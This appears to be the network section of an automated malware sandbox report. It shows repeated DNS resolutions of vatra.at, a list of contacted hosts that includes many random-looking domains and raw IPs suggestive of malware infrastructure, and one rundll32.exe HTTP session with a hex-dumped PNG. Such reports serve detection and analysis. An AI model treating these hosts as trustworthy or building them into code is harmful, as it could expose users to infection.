                                                                                                                                                                                    Jan 5, 2023 08:59:22.647756100 CET8.8.8.8192.168.2.40x6901No error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:22.647756100 CET8.8.8.8192.168.2.40x6901No error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:22.647756100 CET8.8.8.8192.168.2.40x6901No error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:22.647756100 CET8.8.8.8192.168.2.40x6901No error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:22.647756100 CET8.8.8.8192.168.2.40x6901No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:22.647756100 CET8.8.8.8192.168.2.40x6901No error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:22.647756100 CET8.8.8.8192.168.2.40x6901No error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.458014965 CET8.8.8.8192.168.2.40x80caNo error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.458014965 CET8.8.8.8192.168.2.40x80caNo error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.458014965 CET8.8.8.8192.168.2.40x80caNo error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.458014965 CET8.8.8.8192.168.2.40x80caNo error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.458014965 CET8.8.8.8192.168.2.40x80caNo error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.458014965 CET8.8.8.8192.168.2.40x80caNo error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.458014965 CET8.8.8.8192.168.2.40x80caNo error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.458014965 CET8.8.8.8192.168.2.40x80caNo error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.458014965 CET8.8.8.8192.168.2.40x80caNo error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.458014965 CET8.8.8.8192.168.2.40x80caNo error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.924982071 CET8.8.8.8192.168.2.40x5ef2No error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.924982071 CET8.8.8.8192.168.2.40x5ef2No error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.924982071 CET8.8.8.8192.168.2.40x5ef2No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.924982071 CET8.8.8.8192.168.2.40x5ef2No error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.924982071 CET8.8.8.8192.168.2.40x5ef2No error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.924982071 CET8.8.8.8192.168.2.40x5ef2No error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.924982071 CET8.8.8.8192.168.2.40x5ef2No error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.924982071 CET8.8.8.8192.168.2.40x5ef2No error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.924982071 CET8.8.8.8192.168.2.40x5ef2No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.924982071 CET8.8.8.8192.168.2.40x5ef2No error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:26.082267046 CET8.8.8.8192.168.2.40xe7abNo error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:26.082267046 CET8.8.8.8192.168.2.40xe7abNo error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:26.082267046 CET8.8.8.8192.168.2.40xe7abNo error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:26.082267046 CET8.8.8.8192.168.2.40xe7abNo error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:26.082267046 CET8.8.8.8192.168.2.40xe7abNo error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:26.082267046 CET8.8.8.8192.168.2.40xe7abNo error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:26.082267046 CET8.8.8.8192.168.2.40xe7abNo error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:26.082267046 CET8.8.8.8192.168.2.40xe7abNo error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:26.082267046 CET8.8.8.8192.168.2.40xe7abNo error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:26.082267046 CET8.8.8.8192.168.2.40xe7abNo error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:27.778633118 CET8.8.8.8192.168.2.40xd9d9No error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:27.778633118 CET8.8.8.8192.168.2.40xd9d9No error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:27.778633118 CET8.8.8.8192.168.2.40xd9d9No error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:27.778633118 CET8.8.8.8192.168.2.40xd9d9No error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:27.778633118 CET8.8.8.8192.168.2.40xd9d9No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:27.778633118 CET8.8.8.8192.168.2.40xd9d9No error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:27.778633118 CET8.8.8.8192.168.2.40xd9d9No error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:27.778633118 CET8.8.8.8192.168.2.40xd9d9No error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:27.778633118 CET8.8.8.8192.168.2.40xd9d9No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:27.778633118 CET8.8.8.8192.168.2.40xd9d9No error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:28.649419069 CET8.8.8.8192.168.2.40xf8c3No error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:28.649419069 CET8.8.8.8192.168.2.40xf8c3No error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:28.649419069 CET8.8.8.8192.168.2.40xf8c3No error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:28.649419069 CET8.8.8.8192.168.2.40xf8c3No error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:28.649419069 CET8.8.8.8192.168.2.40xf8c3No error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:28.649419069 CET8.8.8.8192.168.2.40xf8c3No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:28.649419069 CET8.8.8.8192.168.2.40xf8c3No error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:28.649419069 CET8.8.8.8192.168.2.40xf8c3No error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:28.649419069 CET8.8.8.8192.168.2.40xf8c3No error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:28.649419069 CET8.8.8.8192.168.2.40xf8c3No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:30.556117058 CET8.8.8.8192.168.2.40x558dNo error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:30.556117058 CET8.8.8.8192.168.2.40x558dNo error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:30.556117058 CET8.8.8.8192.168.2.40x558dNo error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:30.556117058 CET8.8.8.8192.168.2.40x558dNo error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:30.556117058 CET8.8.8.8192.168.2.40x558dNo error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:30.556117058 CET8.8.8.8192.168.2.40x558dNo error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:30.556117058 CET8.8.8.8192.168.2.40x558dNo error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:30.556117058 CET8.8.8.8192.168.2.40x558dNo error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:30.556117058 CET8.8.8.8192.168.2.40x558dNo error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:30.556117058 CET8.8.8.8192.168.2.40x558dNo error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:31.717834949 CET8.8.8.8192.168.2.40x4303No error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:31.717834949 CET8.8.8.8192.168.2.40x4303No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:31.717834949 CET8.8.8.8192.168.2.40x4303No error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:31.717834949 CET8.8.8.8192.168.2.40x4303No error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:31.717834949 CET8.8.8.8192.168.2.40x4303No error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:31.717834949 CET8.8.8.8192.168.2.40x4303No error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:31.717834949 CET8.8.8.8192.168.2.40x4303No error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:31.717834949 CET8.8.8.8192.168.2.40x4303No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:31.717834949 CET8.8.8.8192.168.2.40x4303No error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:31.717834949 CET8.8.8.8192.168.2.40x4303No error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:32.939873934 CET8.8.8.8192.168.2.40x37d2No error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:32.939873934 CET8.8.8.8192.168.2.40x37d2No error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:32.939873934 CET8.8.8.8192.168.2.40x37d2No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:32.939873934 CET8.8.8.8192.168.2.40x37d2No error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:32.939873934 CET8.8.8.8192.168.2.40x37d2No error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:32.939873934 CET8.8.8.8192.168.2.40x37d2No error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:32.939873934 CET8.8.8.8192.168.2.40x37d2No error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:32.939873934 CET8.8.8.8192.168.2.40x37d2No error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:32.939873934 CET8.8.8.8192.168.2.40x37d2No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:32.939873934 CET8.8.8.8192.168.2.40x37d2No error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:34.119940996 CET8.8.8.8192.168.2.40xdc34No error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:34.119940996 CET8.8.8.8192.168.2.40xdc34No error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:34.119940996 CET8.8.8.8192.168.2.40xdc34No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:34.119940996 CET8.8.8.8192.168.2.40xdc34No error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:34.119940996 CET8.8.8.8192.168.2.40xdc34No error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:34.119940996 CET8.8.8.8192.168.2.40xdc34No error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:34.119940996 CET8.8.8.8192.168.2.40xdc34No error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:34.119940996 CET8.8.8.8192.168.2.40xdc34No error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:34.119940996 CET8.8.8.8192.168.2.40xdc34No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:34.119940996 CET8.8.8.8192.168.2.40xdc34No error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:41.014744043 CET8.8.8.8192.168.2.40x9b1No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:41.014744043 CET8.8.8.8192.168.2.40x9b1No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:41.014744043 CET8.8.8.8192.168.2.40x9b1No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:41.014744043 CET8.8.8.8192.168.2.40x9b1No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:41.014744043 CET8.8.8.8192.168.2.40x9b1No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:57.427298069 CET8.8.8.8192.168.2.40x6671No error (0)www.google.com142.250.184.36A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:57.475142002 CET8.8.8.8192.168.2.40x1312No error (0)www.google.com142.250.184.36A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 09:01:02.858834982 CET8.8.8.8192.168.2.40xc334No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                                                                                    • img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                                                                    • login.live.com
                                                                                                                                                                                    • eudb.ris.api.iris.microsoft.com
                                                                                                                                                                                    • ris.api.iris.microsoft.com
                                                                                                                                                                                    • polyzi.com
                                                                                                                                                                                    • lazydowns.com
                                                                                                                                                                                    • accounts.google.com
                                                                                                                                                                                    • clients2.google.com
                                                                                                                                                                                    • https:
                                                                                                                                                                                      • wcpstatic.microsoft.com
                                                                                                                                                                                      • js.monitor.azure.com
                                                                                                                                                                                    • displaycatalog.mp.microsoft.com
                                                                                                                                                                                    • www.facebook.com
                                                                                                                                                                                    • degroeneuitzender.nl
                                                                                                                                                                                    • 23.236.181.126
                                                                                                                                                                                    • cdn.discordapp.com
                                                                                                                                                                                    • api.2ip.ua
                                                                                                                                                                                    • itgey.com
                                                                                                                                                                                      • potunulit.org
                                                                                                                                                                                    • yyhqukkgdn.net
                                                                                                                                                                                    • 62.204.41.145
                                                                                                                                                                                    • pcsutic.net
                                                                                                                                                                                    • sxnpxasd.com
                                                                                                                                                                                    • gqkfi.net
                                                                                                                                                                                    • tooxlaufwa.net
                                                                                                                                                                                    • nrbke.net
                                                                                                                                                                                    • escrqi.org
                                                                                                                                                                                    • iikgugxtwk.org
                                                                                                                                                                                    • lhfmmagywb.net
                                                                                                                                                                                    • 62.204.41.109
                                                                                                                                                                                    • 45.66.230.123
                                                                                                                                                                                    • arkyk.org
                                                                                                                                                                                    • tdfyfvc.com
                                                                                                                                                                                    • sgidnobt.org
                                                                                                                                                                                    • tdpcjask.org
                                                                                                                                                                                    • lltvchw.net
                                                                                                                                                                                    • qqbphwbc.net
                                                                                                                                                                                    • hywhfoacob.com
                                                                                                                                                                                    • bvinqodx.com
                                                                                                                                                                                    • obkjoljk.org
                                                                                                                                                                                    • xffiqjp.net
                                                                                                                                                                                      • vatra.at
                                                                                                                                                                                    • erryxhow.net
                                                                                                                                                                                    • hnbkqrgs.com
                                                                                                                                                                                    • 194.135.33.28
                                                                                                                                                                                    • fmlohbor.org
                                                                                                                                                                                    • aaa.apiaaaeg.com
                                                                                                                                                                                    • efrrst.com
                                                                                                                                                                                    • qcwmsgagss.org
                                                                                                                                                                                    • kvetsemduh.com
                                                                                                                                                                                    • ycfweofqxh.com
                                                                                                                                                                                    • igfkiji.org
                                                                                                                                                                                    • mdhcqj.org
                                                                                                                                                                                    • amcids.net
                                                                                                                                                                                    • agtctbgu.net
                                                                                                                                                                                    • spqdsnj.net
                                                                                                                                                                                    • utfpww.net
                                                                                                                                                                                    • bxleh.com
                                                                                                                                                                                    • nphwrtyf.org
                                                                                                                                                                                    • 45.32.200.113
                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    0192.168.2.44969680.67.82.235443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:56:52 UTC0OUTGET /cms/api/am/imageFileData/RE55ZJm?ver=d909 HTTP/1.1
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                                                    Host: img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:56:52 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Location: https://image.prod.cms.rt.microsoft.com/cms/api/am/imageFileData/RE55ZJm?ver=d909
                                                                                                                                                                                    Last-Modified: Fri, 16 Dec 2022 11:10:06 GMT
                                                                                                                                                                                    X-Source-Length: 72566
                                                                                                                                                                                    X-Datacenter: northeu
                                                                                                                                                                                    X-ActivityId: 5862708f-c80a-4d74-a1fb-1a0b99746842
                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                    Content-Length: 72566
                                                                                                                                                                                    Cache-Control: public, max-age=270867
                                                                                                                                                                                    Expires: Sun, 08 Jan 2023 11:11:19 GMT
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:56:52 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2023-01-05 07:56:52 UTC1INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 06 00 00 00 79 7d 8e 75 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 ff a5 49 44 41 54 78 5e ec fd 67 70 55 57 f7 ef f9 9e aa 7b bb eb f6 a9 ea 53 dd d5 a1 fa d5 ad 7b ce 79 1c c9 08 50 16 39 e7 9c 73 ce 39 e7 9c 73 ce 39 e7 20 09 24 84 24 84 84 90 c8 02 44 12 39 67 db d8 18 db 30 ee 6f 8c 39 e7 5a 73 6d 6d 81 8d e4 e7 fc f5 3c 9a 55 df 9a 6b 6f 61 2c 8c f6 c7 63 2e 09 f1 9f 0a 56 c1 2a 58 05 ab 60 15 ac 82 55 b0 0a 56 c1 2a 58 05 ab 60 15 ac 82 55 b0 0a 56 c1 2a 58 05 ab 60 15 ac 82 55 b0 0a 56 c1 2a 58 05 ab 60 15 ac 82 55 b0 0a 56 c1 2a 58 05 ab 60 15 ac 82 55 b0 0a 56
                                                                                                                                                                                    Data Ascii: PNGIHDR,,y}usRGBgAMAapHYsodIDATx^gpUW{S{yP9s9s9 $$D9g0o9Zsmm<Ukoa,c.V*X`UV*X`UV*X`UV*X`UV*X`UV
                                                                                                                                                                                    2023-01-05 07:56:52 UTC16INData Raw: c9 ff ee 75 7e 48 12 c0 5c 8f f7 4b a3 e5 e4 f3 18 60 39 01 ad c3 0e 5a db 70 bd 5d 72 e1 f2 97 17 b0 28 99 b4 d4 b4 e5 66 4f 60 38 b2 62 da 3a 64 a1 c5 69 02 f2 d7 92 1b e8 1a 2a 85 54 24 0d 03 4c 5c 36 a8 22 5c a4 f8 c6 f9 68 ce 4c 53 0e 52 16 54 00 ca 40 c5 47 3f c6 8a ef 53 f1 54 c5 4d e2 cf f4 01 a5 6c 50 01 a9 19 40 8a 63 a8 66 85 6e a5 99 41 5b 68 7e 85 1d f4 e4 da df f7 b5 56 3c 51 dd 8c ba 49 07 db 1f a4 d5 78 a1 ad e4 63 1e c0 62 a4 04 aa 60 17 2a 33 4d b9 47 be d5 82 94 81 ca 00 b5 0d e8 6c b7 da a1 f3 40 85 49 89 27 28 93 77 92 f2 87 14 a6 28 4e a6 a9 15 74 00 d7 07 0c 4a 80 4b e1 04 88 ac 22 39 00 15 59 0a 8f 19 2a b9 36 48 61 32 91 96 ab 1d 88 a9 c7 2b f0 22 e2 c7 3e 95 e0 56 02 1f 4e a3 04 a8 0e 6b ac 0e 7f a6 23 be e1 7f 06 47 8a 03 2c 3b
                                                                                                                                                                                    Data Ascii: u~H\K`9Zp]r(fO`8b:di*T$L\6"\hLSRT@G?STMlP@cfnA[h~V<QIxcb`*3MGl@I'(w(NtJK"9Y*6Ha2+">VNk#G,;
                                                                                                                                                                                    2023-01-05 07:56:52 UTC32INData Raw: 94 18 3c 9a 8e 07 8e a2 94 f2 e3 e9 e7 ac 5c 7e a3 3b 80 75 73 c0 4a 3a 5d a6 2f 9d 0d 03 50 61 03 e8 7c 28 90 0a 05 50 61 0c 94 ea 62 18 e3 d4 57 ca 08 43 bc a3 4b 56 97 43 fb e8 5d 5d f3 7e 05 fb 95 d0 de 94 c9 85 a8 ae 94 ee 4e b7 db cf a0 8f 7f e4 fe b3 5f af d6 c5 e2 f8 d6 8d ae 97 e9 43 d7 31 b5 5d 03 bc 12 00 bb ce 95 34 7b 3f 37 a0 25 15 b7 1b 00 b0 b0 3b 78 a9 0c 5e 8c d9 75 e0 a5 02 4c be 60 15 1e 4c 37 f4 2e 59 6f 93 e7 cd 3f e3 fc 73 36 64 00 c9 07 af 1b 36 58 e8 da 57 03 e8 c9 e8 bc f9 c3 e1 8f 07 6d c5 b1 10 3f 67 31 1b ac 2f 80 ab 28 c7 68 a9 c7 36 5a ee 8e 69 ab 08 83 35 23 4f c1 ba 54 62 5a ee d0 92 29 8b d1 d2 5f 19 ff 17 d0 d2 04 e4 af e5 4c 56 8c 55 a9 79 0a aa d2 2e 56 7b cb a8 a9 6a 5f a0 81 6a 3a 1d 0c 9c 86 00 55 e0 14 8a 42 0c d5
                                                                                                                                                                                    Data Ascii: <\~;usJ:]/Pa|(PabWCKVC]]~N_C1]4{?7%;x^uL`L7.Yo?s6d6XWm?g1/(h6Zi5#OTbZ)_LVUy.V{j_j:UB
                                                                                                                                                                                    2023-01-05 07:56:52 UTC50INData Raw: c7 58 65 e9 f8 fa c6 f7 03 e8 6e ad 19 94 db 2f 6f f8 f8 cb 7b ba 53 63 26 dd 28 c4 f7 c8 f8 68 a8 d1 42 37 1d b8 f8 a8 88 34 5a 6e a3 9d 3e 79 6f cb 9e b6 0a 8f a1 1b 79 0a d6 14 20 a5 cb 01 2d 09 68 71 2e 5c ea 68 98 33 5a f3 91 3f b4 cc 94 a5 d0 d2 04 e4 af b5 1b 48 ed 05 52 fb 82 11 a0 da 1f 3c 95 0e 04 fb 42 85 a9 2a 14 13 55 e8 78 8a 41 b1 e8 68 18 b0 32 50 31 52 28 11 48 71 0c 55 52 38 90 2a 8b a3 5f 59 40 05 9c 52 d0 49 0e 48 a5 96 1b 44 a7 ca 0f a4 b4 72 03 28 2d a2 3f 9d ad 36 14 60 e5 ee fb 48 31 58 59 1d 27 e2 d8 d7 05 30 75 a3 cb 88 f7 2b 15 bb 51 a6 ee 6a 45 a0 c4 55 e8 82 bd 0b 5d d3 5d af c4 7b 67 ba ce d7 66 af 00 94 2a 74 c2 de 49 f6 1b e5 b9 8e d2 cd 0a a8 6c 7b ba d3 a0 3f 7d f8 39 77 1f bc fc e9 f9 07 ad 46 03 a3 f6 74 3b ac 33 dd 41
                                                                                                                                                                                    Data Ascii: Xen/o{Sc&(hB74Zn>yoy -hq.\h3Z?HR<B*UxAh2P1R(HqUR8*_Y@RIHDr(-?6`H1XY'0u+QjEU]]{gf*tIl{?}9wFt;3A
                                                                                                                                                                                    2023-01-05 07:56:52 UTC66INData Raw: ab d2 18 b9 d8 6a 81 44 31 1d dd ee ca 79 f1 0b fd 71 f7 27 2b 59 b0 ec 94 e5 4e be 27 47 eb 06 2f 71 28 e7 e4 7b f2 29 cb 7d 99 4e 85 05 0b 58 4d 69 8e 0c 54 0e ab cb 8a 55 63 04 a8 92 61 35 13 61 8a ba ae 61 1b 88 23 a1 ca f0 a6 aa 00 2b 3b 55 29 58 f3 08 95 c1 ca 40 85 e6 63 ba 42 b9 b3 31 11 3d 34 e6 f6 4f bc 63 95 7c f2 98 14 cc ff bd 14 a4 e1 81 9e 10 a0 28 33 e0 e4 b7 18 a0 94 1b b0 e2 91 a0 b9 1c 62 0e b4 64 88 c5 c1 65 53 bc 98 87 17 fe 4d 5c 6e e2 22 58 01 5e 01 5c f1 68 15 38 b8 bc 89 2b d8 2a 26 6c 13 93 c1 65 cf 6b 71 8b 88 63 fc b9 2d 7f da 0a a1 a5 e7 b5 10 c0 8a 43 0b 60 99 49 0b 59 b4 b2 7d b4 ec 89 f8 00 ad b8 17 97 de 0c 5a de f9 ac e0 e5 0e ee 7c 96 f7 dd 1d 1c 5a 6e 6b 18 f7 13 78 00 56 ad 91 e6 4b 77 08 56 f5 31 72 f6 8f c3 25 63 e5
